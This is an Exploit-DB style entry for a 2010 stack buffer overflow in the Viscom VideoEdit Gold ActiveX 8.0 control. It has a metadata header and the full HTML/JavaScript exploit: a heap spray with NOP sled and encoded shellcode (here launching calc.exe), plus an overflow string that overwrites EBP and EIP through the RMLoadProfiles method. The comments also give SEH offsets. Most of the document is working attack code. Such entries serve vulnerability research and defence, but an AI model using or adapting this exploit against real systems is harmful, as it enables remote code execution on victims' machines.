Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit

vendor:

VideoEdit Gold ActiveX Control

by:

Rew

CVSS

LOW

Stack Overflow

119

CWE

Product Name: VideoEdit Gold ActiveX Control

Affected Version From: 8.0.0.0

Affected Version To: 8.0.0.0

Patch Exists: NO

Related CWE: NA (0day)

CPE: a:viscom_software:videoedit_gold_activex_control

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WinXP - IE 6

2010

Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit

This is a plain vanilla stack overflow exploit for Viscom VideoEdit Gold ActiveX 8.0. The exploit is a Ctrl+C Ctrl+V, herpderp exploit which uses a shellcode to execute calc.exe. The exploit is relatively low due to object not marked safe for scripting and requires the user to change the default IE settings to let it run.

Mitigation:

Mark the object as safe for scripting

Source

Exploit-DB raw data:

<!--
 
Title: Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit
Date: Dec 5, 2010
Author: Rew
Email: rew [splat] leethax.info
Link: http://www.viscomsoft.com/products/videoeditgold/index.html
Version: 8.0.0.0
Tested on: WinXP - IE 6
CVE: NA (0day)
 
Impact is relatively low due to object not marked safe for scripting.  You'll
need to change the default IE settings to let it run.

This is a plain vanilla stack overflow.  The file is...
"%PROGRAMFILES%\VideoEdit Gold ActiveX Control\VideoEdit.ocx"
I'm not using the SEH but here's the offsets just for kicks if you're interested.

[2311 junk] [ebp] [eip] [284 junk] [nseh] [seh]
 
-->

<object classid='clsid:57D9AF4C-23BA-47EC-A40B-2DA79641B285' id='target' /></object>

<script>

// Ctrl+C Ctrl+V, herpderp

// calc.exe
var shellcode = unescape(
	'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
	'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
	'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
	'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
	'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
	'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
	'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
	'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'
); 

var nops = unescape('%u9090%u9090');

var headersize = 20;
var slackspace = headersize + shellcode.length;

while(nops.length < slackspace) {
	nops += nops;
}

var fillblock = nops.substring(0, slackspace);
var block = nops.substring(0, nops.length - slackspace);

while((block.length + slackspace) < 0x50000) {
	block = block + block + fillblock;
}

memory=new Array();
for(counter=0; counter<200; counter++){
	memory[counter] = block + shellcode;
}

var bof = '';
while(bof.length < 2312){
	bof += 'A';
}
bof += 'BBBB'; // EBP
bof += "\x0c\x0c\x0c\x0c"; // EIP

document.getElementById('target').RMLoadProfiles( bof );

</script>